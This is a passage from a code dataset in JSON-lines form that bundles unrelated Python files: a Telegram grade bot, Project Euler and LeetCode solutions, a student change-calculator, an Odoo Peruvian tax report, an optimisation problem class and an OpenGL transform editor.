area=a, multiple_tables=True, guess=False)\n name = df[6][2][0]\n enroll = df[6][5][0]\n bot.send_message(message.chat.id,name + \"\\n\" + enroll + '\\n')\n df = read_pdf('../data/cse.pdf', pages=k, area=a[3], guess=False,\n pandas_options={'names': ['Code', 'Course', 'Credits', 'Grade']})\n for i in range(len(df)):\n d = \"Code: \" + df['Code'][i] + \"\\n\" + \"Course: \" + df['Course'][i] + '\\n' + \"Credits: \" + str(\n df['Credits'][i].item()) + \"\\n\" + \"Grade: \" + df['Grade'][i]\n bot.send_message(message.chat.id,d + '\\n')\n df = read_pdf('../data/cse.pdf', pages=k, area=a[0], guess=False, pandas_options={'header': None})\n cg = df[6][1]\n sg = df[3][1]\n c_cre = df[7][3]\n s_cre = df[3][3]\n s_cre = s_cre[5:]\n c_cre = c_cre[5:]\n print(s_cre + c_cre + sg + cg)\n bot.send_message(message.chat.id,\"Semester Credits: \" + s_cre + \"\\nTotal Credits: \" + c_cre)\n bot.send_message(message.chat.id,'SGPA: ' + sg + '\\nCGPA: ' + cg)\n\n\n#replying same message\n\n@bot.message_handler(func=lambda m: True)\ndef echo_all(message):\n # js = message\n bot.reply_to(message, \"I didn't get....\")\n # bot.send_message(message.chat.id,\"List of Commands:\\n/start\\n/pun\\n/help\\n/set_dept\\n/BT17CSE030\")\n help_command(message)\n\n\n\n\n# bot.polling()\n#abc\nbot.polling(none_stop=True)\n","repo_name":"alpha-k911/vnit_bot","sub_path":"telegram/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21431954616","text":"nums = [x for x in range(1000000)]\nnums[1] = 0\nfor i in range(2,len(nums)):\n n = nums[i]\n if n != 0:\n for j in range(i*2,len(nums),i):\n nums[j] = 0\n\nprimes = list(filter(lambda x: x != 0, nums))\nprint(len(primes))\n\n# try first 1000 primes dp strategy\nprev = primes[0]\ncache = [[prev]]\n\nfor p in primes[1:1000]:\n prev += p\n cache[0].append(prev)\n\nfor idx, p in enumerate(primes[:5]):\n row = [i-p for i in cache[idx]]\n cache.append(row)\n\n# print(len(cache))\n# print(len(cache[-1]))\n\nmx = 0\nbest = 0\nstart = 0\nfor i1, row in enumerate(cache):\n for i2, el in enumerate(row):\n z = i2 - i1\n if z > mx:\n if el in primes and el < 1000000:\n mx = z\n start = i1\n best = el\n print(mx,i1,el)\n\nprint('fin')\nprint(mx,best)\n","repo_name":"ethanbond64/Project-Euler","sub_path":"euler_problems/Euler50.py","file_name":"Euler50.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24728710871","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport pandas as pd\nimport sys\n\nclass DataAnalysis(object):\n def __init__(self, path):\n data_raw = pd.read_csv(path).drop(\"Index\", axis = 1)\n self.data = data_raw.copy()\n self.data = self.data.loc[:, self.data.dtypes == \"float64\"]\n self.header = self.data.columns\n self.data = np.array(self.data.T)\n\n def compute_for_columns(self, function):\n row = []\n for col in self.data:\n row.append(function(col))\n return(row)\n\n def col_count(self, column):\n count = 0\n for i in column:\n if not np.isnan(i):\n count += 1\n return(count)\n\n def col_mean(self, column):\n col_sum = 0\n for i in column:\n if not np.isnan(i):\n col_sum += i\n return(col_sum/self.col_count(column))\n\n def col_std(self, column):\n mean = self.col_mean(column)\n return(np.sqrt(self.col_mean(np.square(column-mean))))\n\n def col_filter_nan(self, column):\n new_col = []\n for i in column:\n if not np.isnan(i):\n new_col.append(i)\n return(new_col)\n\n def col_sort(self, column):\n sorted_col = self.col_filter_nan(column)\n for i in range(1, len(sorted_col)):\n j = i-1\n nxt_element = sorted_col[i]\n # Compare the current element with next one\n while (sorted_col[j] > nxt_element) and (j >= 0):\n sorted_col[j+1] = sorted_col[j]\n j=j-1\n sorted_col[j+1] = nxt_element\n return(sorted_col)\n\n def col_min(self, column):\n return(self.col_sort(column)[0])\n\n def col_max(self, column):\n return(self.col_sort(column)[-1])\n\n def col_quantile(self, column, fraction):\n n = self.col_count(column)\n m = fraction*n\n sorted_col = self.col_sort(column)\n if np.floor(m) == m:\n return(sorted_col[int(m)])\n else:\n return((sorted_col[int(np.floor(m))] + sorted_col[int(np.ceil(m))])/2)\n\n def col_quantile_25(self, column):\n return(self.col_quantile(column,0.25))\n\n def col_median(self, column):\n return(self.col_quantile(column,0.5))\n\n def col_quantile_75(self, column):\n return(self.col_quantile(column,0.75))\n\n def describe_42(self):\n data_description = [np.round(self.compute_for_columns(self.col_count), 6),\n np.round(self.compute_for_columns(self.col_mean), 6),\n np.round(self.compute_for_columns(self.col_std), 6),\n np.round(self.compute_for_columns(self.col_min), 6),\n np.round(self.compute_for_columns(self.col_quantile_25), 6),\n np.round(self.compute_for_columns(self.col_median), 6),\n np.round(self.compute_for_columns(self.col_quantile_75), 6),\n np.round(self.compute_for_columns(self.col_max), 6)]\n\n print(pd.DataFrame(data_description, index = [\"Count\",\"Mean\",\"Std\",\"Min\",\"25%\",\"50%\",\"75%\", \"Max\"], columns = self.header))\n\nif __name__ == \"__main__\":\n path = sys.argv[1]\n DataAnalysis(path).describe_42()\n","repo_name":"samimhirech/42-logistic-regression","sub_path":"src/describe.py","file_name":"describe.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9902983000","text":"#SNGSOH004\n#Assignment 5\n#Question2\n\ncost = eval(input(\"Enter the cost (in cents):\\n\"))\n\nif (cost!=0): #As long as the cost is not 0\n deposit=eval(input(\"Deposit a coin or note (in cents):\\n\"))\n remainder = cost-deposit\n \n while (remainder>0): #While there is still money outstanding:\n deposit+=eval(input(\"Deposit a coin or note (in cents):\\n\"))\n remainder = cost-deposit\n \n string = str(abs(remainder)) #Storing the remainder in a string for future string handling\n \n if(eval(string)>0): #If the value in the string is greater than 0 (person has overpaid)\n onedollar=\"0\"\n if(len(string)>2):\n onedollar = string[:-2] #The amount of $1 bills to be paid back\n cents = eval(string[-2:])\n twentyfive = cents//25 #The number of twenty five cents coins to be paid back\n cents = cents%25 #Reducing the change amount\n ten = cents//10 #The number of ten cents coins to be paid back\n cents = cents%10 #Reducing the change amount\n five = cents//5 #The number of five cents coins to be paid back\n cents = cents%5 #Reducing the change amount\n one = cents//1 #The number of one cent coins to be paid back\n \n print(\"Your change is:\")\n if(eval(onedollar)>0):\n print(onedollar+\" x $1\")\n if(twentyfive>0):\n print(twentyfive,\"x 25c\")\n if(ten>0):\n print(ten,\"x 10c\")\n if(five>0):\n print(five,\"x 5c\")\n if(one>0):\n print(one,\"x 1c\")","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_5/sngsoh004/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26239188904","text":"\"\"\"\"\"\"\nfrom electricipy.raspi.gpio_controller import GPIOController\n\n\nclass InputController(GPIOController):\n \"\"\"\"\"\"\n\n def _initialize_gpio(self):\n \"\"\" Initialize the GPIO pins. \"\"\"\n for pin in self._pins:\n self._pi.set_mode(pin, pigpio.INPUT)\n","repo_name":"obulka/electricipy","sub_path":"electricipy.raspi/src/electricipy/raspi/input_devices/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2347394538","text":"from django.db import models\n# Create your models here.\nclass slideimage(models.Model):\n slideimage_name=models.CharField(max_length=50 , unique=True)\n description = models.TextField(max_length=300 , blank=True)\n slideimage_image =models.ImageField (upload_to= 'photos/slideimages', blank=True)\n\n class Meta:\n verbose_name ='slideimage'\n verbose_name_plural ='slideimages' \n\n \n \n def __str__(self):\n return self.slideimage_name\n\n","repo_name":"Nasser-Nzlawy/stores","sub_path":"sliderimages/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36362971622","text":"#функция возвращает список, содержащий простые числа от\n#1 до введенного включительно\n#сложность = O(N^2)\n\ndef foo(n):\n # n - число\n res = []\n for i in range(1, n + 1):\n divisors = 0\n j = 2\n while j < i and divisors == 0:\n if i % j == 0:\n divisors += 1\n j += 1\n\n if divisors == 0:\n res.append(i)\n\n return res\n","repo_name":"dolphin-in-a-coma/python-course","sub_path":"2-9_Rest_subjects/6_Time_complexity/6.2.4.py","file_name":"6.2.4.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41166303030","text":"class Solution(object):\n def rob(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if len(nums)<1:\n return 0\n\n if len(nums)==1:\n return nums[0]\n\n curr1,pre1,tmp1=0,0,0\n curr2,pre2,tmp2=0,0,0\n\n for i in range(0,len(nums)-1):\n tmp1 = max(pre1+nums[i],curr1)\n pre1,curr1 = curr1,tmp1\n\n curr2,pre2,tmp2=0,0,0\n for i in range(1,len(nums)):\n tmp2 = max(pre2+nums[i],curr2)\n pre2,curr2 = curr2,tmp2\n\n return max(curr1,curr2)\n\n","repo_name":"abhitrip/scratchpad","sub_path":"LeetCode/pythonSols/houserobber2.py","file_name":"houserobber2.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4391582026","text":"from odoo import _, api, models\nfrom odoo.exceptions import UserError\n\n\nclass AccountReport(models.Model):\n _inherit = 'account.report'\n\n @api.model\n def _get_options_all_entries_domain(self, options):\n \"\"\"For sale reports, must be considered cancelled and posted documents\"\"\"\n result = super()._get_options_all_entries_domain(options)\n if self and self != self.env.ref(\"l10n_pe_reports.tax_report_ple_sales_14_1\"):\n return result\n return [\"|\", (\"parent_state\", \"=\", \"posted\"), \"&\",\n (\"parent_state\", \"=\", \"cancel\"), (\"move_id.l10n_pe_edi_cancel_cdr_number\", \"!=\", False)]\n\n\nclass PeruvianTaxPle141ReportCustomHandler(models.AbstractModel):\n _name = \"l10n_pe.tax.ple.14.1.report.handler\"\n _inherit = \"l10n_pe.tax.ple.report.handler\"\n _description = \"PLE Sales Report 14.1\"\n\n def _get_report_number(self):\n return \"1401\"\n\n def export_to_txt(self, options):\n def format_float(amount):\n \"\"\"Avoid -0 on TXT report\"\"\"\n if amount == 0:\n return abs(amount)\n return amount\n\n lines = self._get_ple_report_data(options, \"move_id\")\n data = []\n period = options[\"date\"][\"date_from\"].replace(\"-\", \"\")\n state_error = []\n for line in lines:\n columns = line[1]\n if columns[\"status\"] == \"posted\" and columns[\"edi_state\"] != \"sent\":\n state_error.append(columns[\"move_name\"])\n continue\n serie_folio = self._get_serie_folio(columns[\"move_name\"])\n serie_folio_related = self._get_serie_folio(columns[\"related_document\"])\n data.append(\n {\n \"period\": \"%s00\" % period[:6],\n \"identificator_type_date\": \"%s\" % line[0],\n \"identificator_correlative\": \"M%s\" % line[0],\n \"invoice_date\": columns[\"invoice_date\"].strftime(\"%d/%m/%Y\") if columns[\"invoice_date\"] else \"\",\n \"date_due\": columns[\"date_due\"].strftime(\"%d/%m/%Y\") if columns[\"date_due\"] else \"\",\n \"document_type\": columns[\"document_type\"],\n \"document_serie\": serie_folio[\"serie\"].replace(\" \", \"\"),\n \"document_number\": serie_folio[\"folio\"].replace(\" \", \"\"),\n \"payment_number\": \"\", # Related payment not implemented yet\n \"customer_id\": columns[\"partner_lit_code\"],\n \"customer_vat\": columns[\"customer_vat\"] or \"\",\n \"customer\": columns[\"customer\"],\n \"base_exp\": format_float(columns[\"base_exp\"]) or \"\",\n \"base_igv\": format_float(columns[\"base_igv\"]) or \"\",\n \"amount_discount\": \"\",\n \"tax_igv\": format_float(columns[\"tax_igv\"]) or \"\",\n \"tax_igv_discount\": \"\",\n \"base_exo\": format_float(columns[\"base_exo\"]) or \"\",\n \"base_ina\": format_float(columns[\"base_ina\"]) or \"\",\n \"tax_isc\": format_float(columns[\"tax_isc\"]) or \"\",\n \"base_ivap\": format_float(columns[\"base_ivap\"]) or \"\",\n \"tax_ivap\": format_float(columns[\"tax_ivap\"]) or \"\",\n \"vat_icbper\": format_float(columns[\"vat_icbper\"]) or \"0.00\",\n \"tax_oth\": \"\",\n \"amount_total\": columns[\"amount_total\"] or \"\",\n \"currency\": columns[\"currency\"],\n \"rate\": \"%.3f\" % abs(columns[\"rate\"]),\n \"emission_date_related\": columns[\"emission_date_related\"].strftime(\"%d/%m/%Y\") if columns[\n \"emission_date_related\"] else \"\",\n \"document_type_related\": columns[\"document_type_related\"] or \"\",\n \"related_document_serie\": serie_folio_related.get(\"serie\", \"\").replace(\" \", \"\"),\n \"related_document_number\": serie_folio_related.get(\"folio\", \"\").replace(\" \", \"\"),\n \"contract_identification_OSIC\": \"\", # Exclusive use of operators of irregular companies, consortia\n \"currency_error\": \"\",\n \"canceled_by_payment\": \"\",\n \"invoice_status\": self._get_document_status(\n columns[\"status\"], columns[\"invoice_date\"], columns[\"date\"]\n ),\n \"final_pipe\": \"\", # this field is only to print a technical closing pipe\n }\n )\n\n if state_error:\n raise UserError(_(\n \"The state in the next documents are posted, but are not present in the SUNAT:\\n\\n%s\") % '\\n'.join(\n state_error))\n\n return self._get_file_txt(options, data)\n\n def _custom_options_initializer(self, report, options, previous_options=None):\n super()._custom_options_initializer(report, options, previous_options=previous_options)\n options['forced_domain'] = [\n *options.get('forced_domain', []),\n (\"move_id.move_type\", \"in\", (\"out_invoice\", \"out_refund\")),\n ]\n\n def _report_custom_engine_ple_14_1(\n self, expressions, options, date_scope, current_groupby, next_groupby, offset=0, limit=None\n ):\n report = self.env[\"account.report\"].browse(options[\"report_id\"])\n report._check_groupby_fields(\n (next_groupby.split(\",\") if next_groupby else []) + ([current_groupby] if current_groupby else [])\n )\n\n return self._get_ple_report_data(options, current_groupby)\n","repo_name":"wilsonHarper/enterprise","sub_path":"l10n_pe_reports/models/account_ple_sales_14_1.py","file_name":"account_ple_sales_14_1.py","file_ext":"py","file_size_in_byte":5555,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"20838989852","text":"import copy\nfrom abc import ABC, abstractmethod\nfrom typing import List, Optional, Union\n\nimport numpy as np\n\nfrom desdeo.utils.misc import as_minimized\n\n\nclass MOProblem(ABC):\n \"\"\"\n Abstract base class for multiobjective problem\n\n Attributes\n ----------\n variables : list of Variables\n MOProblem decision variable information\n\n ideal\n Ideal, i.e, the worst values of objective functions\n\n nadir\n Nadir, i.e, the best values of objective functions\n\n maximized\n Indicates maximized objectives\n \"\"\"\n\n def __init__(\n self,\n nobj: int,\n nconst: int = 0,\n ideal: Optional[List[float]] = None,\n nadir: Optional[List[float]] = None,\n maximized: Optional[List[bool]] = None,\n objectives: Optional[List[str]] = None,\n name: str = None,\n points: Optional[List[float]] = None,\n ) -> None:\n self.nobj = nobj\n self.nconst = nconst\n self.variables = [] # type: List[Variable]\n self.ideal = ideal\n self.nadir = nadir\n self.points = points\n if maximized is not None:\n self.maximized = maximized # type: Optional[List[bool]]\n elif self.ideal is not None:\n self.maximized = [False] * len(self.ideal)\n else:\n self.maximized = None\n\n if objectives is None:\n self.objectives = [\"f%i\" % (i + 1) for i in range(self.nobj)]\n else:\n self.objectives = objectives\n self.name = name\n\n if self.ideal and self.nadir and self.maximized:\n self.maximum = self.as_minimized(\n [\n i if m else n\n for i, n, m in zip(self.ideal, self.nadir, self.maximized)\n ]\n )\n self.minimum = self.as_minimized(\n [\n n if m else i\n for i, n, m in zip(self.ideal, self.nadir, self.maximized)\n ]\n )\n\n @abstractmethod\n def evaluate(self, population):\n \"\"\"\n Evaluate the objective and constraint functions for population and return tuple (objective,constraint) values\n\n\n Parameters\n ----------\n population : list of variable values\n Description\n \"\"\"\n\n def objective_bounds(self):\n \"\"\"\n Return objective bounds\n\n\n Returns\n -------\n lower : list of floats\n Lower boundaries for the objectives\n\n Upper : list of floats\n Upper boundaries for the objectives\n\n \"\"\"\n if self.ideal and self.nadir:\n return self.ideal, self.nadir\n raise NotImplementedError(\n \"Ideal and nadir value calculation is not yet implemented\"\n )\n\n def nof_objectives(self) -> Optional[int]:\n if self.ideal and self.nadir:\n assert len(self.ideal) == len(self.nadir)\n return len(self.ideal)\n else:\n return None\n\n def nof_variables(self) -> int:\n return len(self.variables)\n\n def add_variables(\n self, variables: Union[List[\"Variable\"], \"Variable\"], index: int = None\n ) -> None:\n \"\"\"\n Parameters\n ----------\n variable : list of variables or single variable\n Add variables as problem variables\n\n index : int\n Location to add variables, if None add to the end\n\n \"\"\"\n if isinstance(variables, Variable):\n addvars = copy.deepcopy([variables])\n else:\n addvars = copy.deepcopy(variables)\n\n if index is None:\n self.variables.extend(addvars)\n else:\n self.variables[index:index] = addvars\n\n def as_minimized(self, v):\n return as_minimized(v, self.maximized)\n\n def bounds(self):\n\n return [v.bounds for v in self.variables]\n\n\nclass PythonProblem(MOProblem):\n pass\n\n\nclass Variable(object):\n \"\"\"\n Attributes\n ----------\n bounds : list of numeric values\n lower and upper boundaries of the variable\n\n name : string\n Name of the variable\n\n starting_point : numeric value\n Starting point for the variable\n \"\"\"\n\n def __init__(self, bounds=None, starting_point=None, name=\"\"):\n \"\"\"\n Constructor\n\n\n \"\"\"\n self.bounds = bounds\n self.starting_point = starting_point\n self.name = name\n\n\nclass PreGeneratedProblem(MOProblem):\n \"\"\" A problem where the objective function values have beeen pregenerated\n \"\"\"\n\n def __init__(self, filename=None, points=None, delim=\",\", **kwargs):\n self.points = []\n self.original_points = []\n if points:\n self.original_points = list(points)\n self.points = list(points)\n elif filename:\n with open(filename) as fd:\n for r in fd:\n self.points.append(list(map(float, map(str.strip, r.split(delim)))))\n self.original_points = list(self.points)\n\n super().__init__(nobj=len(self.points[0]), points=self.points, **kwargs)\n\n if not self.ideal:\n self.ideal = list(np.min(self.points, axis=0))\n if not self.nadir:\n self.nadir = list(np.max(self.points, axis=0))\n\n def evaluate(self, population=None):\n return self.points\n","repo_name":"naricode/InteractiveNautilusBasedAlgorithm","sub_path":"desdeo/problem/Problem.py","file_name":"Problem.py","file_ext":"py","file_size_in_byte":5338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73961044279","text":"__author__ = 'Lubosz Sarnecki'\n\nfrom gi.repository import Graphene, Gdk\nimport numpy\nimport math\nfrom gst_opengl_editor.graphics import *\nfrom numpy import array\n\n\ndef matrix_to_array(m):\n result = []\n for x in range(0, 4):\n result.append([m.get_value(x, 0),\n m.get_value(x, 1),\n m.get_value(x, 2),\n m.get_value(x, 3)])\n return numpy.array(result, 'd')\n\n\nclass Scene():\n def __init__(self):\n self.handles = {}\n self.graphics = {}\n self.width, self.height = 0, 0\n self.init = False\n self.window = None\n\n def relative_position(self, event):\n # between 0 and 1\n x = event.x / self.width\n y = 1.0 - (event.y / self.height)\n\n # between -1 and 1\n return (2 * x - 1,\n (2 * y - 1))\n\n def aspect(self):\n if self.width == 0 or self.height == 0:\n return 1\n return self.width / self.height\n\n def set_cursor(self, type):\n display = Gdk.Display.get_default()\n cursor = Gdk.Cursor.new_for_display(display, type)\n self.window.get_window().set_cursor(cursor)\n\n def reshape(self, sink, context, width, height):\n self.width, self.height = width, height\n if not self.init:\n self.init_gl(context)\n self.init = True\n glViewport(0, 0, width, height)\n return True\n\n def init_gl(self, context):\n glClearColor(0.0, 0.0, 0.0, 0.0)\n glDisable(GL_DEPTH_TEST)\n glEnable(GL_BLEND)\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\n glEnable(GL_TEXTURE_RECTANGLE)\n\n\nclass HandleActor():\n def __init__(self, drag, x=0, y=0):\n self.position = (x, y)\n self.clicked = False\n self.initital_position = self.position\n self.drag = drag\n self.size = 1.0\n\n def is_clicked(self, click):\n vclick = Graphene.Vec2.alloc()\n vclick.init(click[0], click[1])\n vpos = Graphene.Vec2.alloc()\n vpos.init(self.position[0], self.position[1])\n vdistance = vclick.subtract(vpos)\n\n hovered = vdistance.length() < 0.05 * self.size\n\n self.hovered = hovered\n\n return hovered\n\n def reposition(self, matrix, aspect):\n vector = numpy.array([self.initital_position[0] * aspect,\n self.initital_position[1], 0, 1])\n vector_transformed = numpy.dot(vector, matrix)\n\n self.position = (vector_transformed[0], -vector_transformed[1])\n\n def distance_to(self, actor):\n distance = array(self.position) - array(actor.position)\n return numpy.sqrt(distance.dot(distance))\n\n def model_matrix(self):\n model_matrix = Graphene.Matrix.alloc()\n\n model_matrix.init_scale(self.size, self.size, 1.0)\n\n translation_vector = Graphene.Point3D.alloc()\n translation_vector.init(self.position[0], self.position[1], 0)\n\n model_matrix.translate(translation_vector)\n\n return matrix_to_array(model_matrix)\n\n\nclass BoxActor():\n def __init__(self, drag):\n self.drag = drag\n\n def is_clicked(self, click, handles):\n\n from shapely.geometry import Point\n from shapely.geometry.polygon import Polygon\n\n point = Point(*click)\n polygon = Polygon([handles[\"1BL\"].position,\n handles[\"2TL\"].position,\n handles[\"3TR\"].position,\n handles[\"4BR\"].position])\n\n return polygon.contains(point)\n\n def get_center(self, handles):\n diagonal = array(handles[\"1BL\"].position) - array(handles[\"3TR\"].position)\n\n center = array(handles[\"3TR\"].position) + diagonal / 2.0\n\n return center\n\n\nclass TransformScene(Scene):\n def __init__(self):\n Scene.__init__(self)\n\n self.corner_handles = {\n \"1BL\": HandleActor(self.scale_keep_aspect, -1, -1),\n \"2TL\": HandleActor(self.scale_keep_aspect, -1, 1),\n \"3TR\": HandleActor(self.scale_keep_aspect, 1, 1),\n \"4BR\": HandleActor(self.scale_keep_aspect, 1, -1)}\n\n self.edge_handles = {\n \"left\": HandleActor(self.scale_height, -1, 0),\n \"right\": HandleActor(self.scale_height, 1, 0),\n \"top\": HandleActor(self.scale_width, 0, 1),\n \"bottom\": HandleActor(self.scale_width, 0, -1)}\n\n self.graphics[\"handle\"] = HandleGraphic(100, 100)\n self.graphics[\"video\"] = VideoGraphic()\n self.graphics[\"box\"] = BoxGraphic(self.corner_handles.values())\n\n self.graphics[\"background\"] = BackgroundGraphic()\n\n self.handles = list(self.corner_handles.values()) \\\n + list(self.edge_handles.values())\n\n self.box_actor = BoxActor(self.translate)\n self.selected = False\n self.slider_box = None\n self.action = None\n\n self.zoom = 1.0\n self.set_zoom_matrix(self.zoom)\n\n def on_scroll(self, sink, event):\n deltas = event.get_scroll_deltas()\n v = self.zoom_slider.get_value()\n if deltas[0]:\n v -= deltas[2] * 0.1 * self.zoom\n self.zoom_slider.set_value(v)\n\n def set_zoom_matrix(self, zoom):\n self.zoom_matrix = Graphene.Matrix.alloc()\n self.zoom_matrix.init_scale(zoom, zoom, 1.0)\n\n def set_zoom(self, scale):\n self.zoom = scale.get_value()\n self.set_zoom_matrix(self.zoom)\n\n self.reposition()\n\n def deselect(self):\n self.selected = False\n # default\n self.set_cursor(Gdk.CursorType.ARROW)\n\n def init_gl(self, context):\n Scene.init_gl(self, context)\n\n cairo_shader = Shader(context, \"simple.vert\", \"cairo.frag\")\n\n self.graphics[\"handle\"].init_gl(\n context, self.width, self.height, cairo_shader)\n self.graphics[\"box\"].init_gl(\n context, self.width, self.height, cairo_shader)\n self.graphics[\"video\"].init_gl(context)\n self.graphics[\"background\"].init_gl(\n context, self.width, self.height, cairo_shader)\n\n self.init = True\n\n def reposition(self):\n\n matrix = numpy.dot(self.slider_box.mvp(), matrix_to_array(self.zoom_matrix))\n\n distance1 = self.corner_handles[\"1BL\"].distance_to(self.edge_handles[\"bottom\"])\n distance2 = self.corner_handles[\"2TL\"].distance_to(self.edge_handles[\"left\"])\n\n if distance1 < 0.1 or distance2 < 0.1:\n size = 10.0 * min(distance1, distance2)\n else:\n size = 1.0\n\n for handle in self.handles:\n handle.reposition(matrix, self.aspect())\n handle.size = size\n\n def draw(self, sink, context, video_texture, w, h):\n if not self.init:\n return\n\n context.clear_shader()\n\n glClearColor(0, 0, 0, 1)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n context.clear_shader()\n self.graphics[\"background\"].draw()\n context.clear_shader()\n self.graphics[\"video\"].draw(video_texture, matrix_to_array(self.zoom_matrix))\n context.clear_shader()\n\n if self.selected:\n self.graphics[\"box\"].draw(self.corner_handles)\n self.graphics[\"handle\"].draw_actors(self.handles)\n\n return True\n\n def get_rotation(self, event):\n center = self.box_actor.get_center(self.corner_handles) * array([self.aspect(), 1])\n click = array(self.relative_position(event)) * array([self.aspect(), 1])\n\n distance = click - center\n distance /= numpy.linalg.norm(distance)\n\n axis = array([1, 0])\n\n rot = math.atan2(distance[1], distance[0]) - math.atan2(axis[1], axis[0])\n\n return math.degrees(-rot)\n\n def scale_width(self, event):\n scale_y = self.slider_box.sliders[\"scale-y\"]\n scale_y.set(self.center_distance(event))\n\n def scale_height(self, event):\n scale_x = self.slider_box.sliders[\"scale-x\"]\n scale_x.set(self.center_distance(event))\n\n def center_distance(self, event):\n center = self.box_actor.get_center(self.corner_handles)\n distance = center - array(self.relative_position(event))\n return numpy.sqrt(distance.dot(distance)) / self.zoom\n\n def scale_keep_aspect(self, event):\n old_aspect = self.old_scale[0] / self.old_scale[1]\n scale_x = self.slider_box.sliders[\"scale-x\"]\n scale_y = self.slider_box.sliders[\"scale-y\"]\n distance = self.center_distance(event)\n scale_x.set(old_aspect * distance / math.sqrt(2))\n scale_y.set(distance / math.sqrt(2))\n\n def rotate(self, event):\n rotation = self.slider_box.sliders[\"rotation-z\"]\n rotation.set((self.oldrot + self.get_rotation(event)) % 360)\n\n def translate(self, event):\n pos = array(self.relative_position(event))\n\n # drag cursor\n self.set_cursor(Gdk.CursorType.FLEUR)\n\n x = self.slider_box.sliders[\"translation-x\"]\n y = self.slider_box.sliders[\"translation-y\"]\n\n oldpos = array(self.oldpos)\n\n translation = array([pos[0] / 2.0, -pos[1] / 2.0])\n\n translation /= self.zoom\n\n x.set(oldpos[0] + translation[0])\n y.set(oldpos[1] + translation[1])\n\n def on_press(self, event):\n # Right click\n if event.get_button()[1] == 3:\n self.deselect()\n # Left click\n elif event.get_button()[1] == 1:\n for actor in self.handles:\n if actor.is_clicked(self.relative_position(event)):\n self.action = actor.drag\n self.old_scale = (self.slider_box.sliders[\"scale-x\"].get(),\n self.slider_box.sliders[\"scale-y\"].get())\n actor.clicked = True\n return\n\n if self.box_actor.is_clicked(self.relative_position(event), self.corner_handles):\n self.action = self.translate\n self.selected = True\n\n pos = self.relative_position(event)\n\n self.oldpos = ((self.slider_box.sliders[\"translation-x\"].get() - pos[0] / self.zoom * 0.5),\n self.slider_box.sliders[\"translation-y\"].get() + pos[1] / self.zoom * 0.5)\n else:\n #clicked outside of box\n self.action = self.rotate\n\n self.oldrot = self.slider_box.sliders[\"rotation-z\"].get() - self.get_rotation(event)\n\n def on_motion(self, sink, event):\n if not self.selected:\n return\n\n self.action(event)\n\n def on_release(self, sink, event):\n self.focused_actor = None\n self.action = self.on_hover\n\n self.set_cursor(Gdk.CursorType.ARROW)\n\n for actor in self.handles:\n actor.clicked = False\n\n # cursor stuff\n def on_hover(self, event):\n\n resize_cursors = {\n 90: Gdk.CursorType.BOTTOM_RIGHT_CORNER,\n 180: Gdk.CursorType.BOTTOM_LEFT_CORNER,\n 270: Gdk.CursorType.TOP_LEFT_CORNER,\n 360: Gdk.CursorType.TOP_RIGHT_CORNER\n }\n\n for actor in self.corner_handles.values():\n if actor.is_clicked(self.relative_position(event)):\n rot = self.get_rotation(event) % 360\n for cursor_rot in sorted(resize_cursors):\n if rot < cursor_rot:\n self.set_cursor(resize_cursors[cursor_rot])\n return\n\n resize_cursors_edge = {\n 90: Gdk.CursorType.BOTTOM_SIDE,\n 180: Gdk.CursorType.LEFT_SIDE,\n 270: Gdk.CursorType.TOP_SIDE,\n 360: Gdk.CursorType.RIGHT_SIDE\n }\n\n for actor in self.edge_handles.values():\n if actor.is_clicked(self.relative_position(event)):\n # rotate by 45°, so the detection is not axis aligned\n rot = (self.get_rotation(event) - 45) % 360\n for cursor_rot in sorted(resize_cursors_edge):\n if rot < cursor_rot:\n self.set_cursor(resize_cursors_edge[cursor_rot])\n return\n\n if self.box_actor.is_clicked(self.relative_position(event), self.corner_handles):\n # inside box\n self.set_cursor(Gdk.CursorType.ARROW)\n else:\n # rotate\n self.set_cursor(Gdk.CursorType.EXCHANGE)\n","repo_name":"lubosz/gst-gl-tests","sub_path":"gst_opengl_editor/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":12326,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"39646425973","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport torch\n\n\ndef precision_single_class(y_true, y_pred, cls):\n \"\"\"\n Precision over a single class\n\n Args:\n y_true: array\n array of true labels\n y_pred: array\n array of predicted labels\n cls: int\n class over which to calculate precision\n \"\"\"\n\n y_true = (y_true == cls).astype(int) # single class true labels\n y_pred = (y_pred == cls).astype(int) # single class predicted labels\n\n true_pos = y_true * y_pred # true positives\n false_pos = y_pred - true_pos # false positives\n\n true_pos = np.sum(true_pos)\n false_pos = np.sum(false_pos)\n\n if true_pos + false_pos == 0.0:\n return 0.0\n\n return true_pos / (true_pos + false_pos)\n\n\ndef recall_single_class(y_true, y_pred, cls):\n \"\"\"\n Recall over a single class\n\n 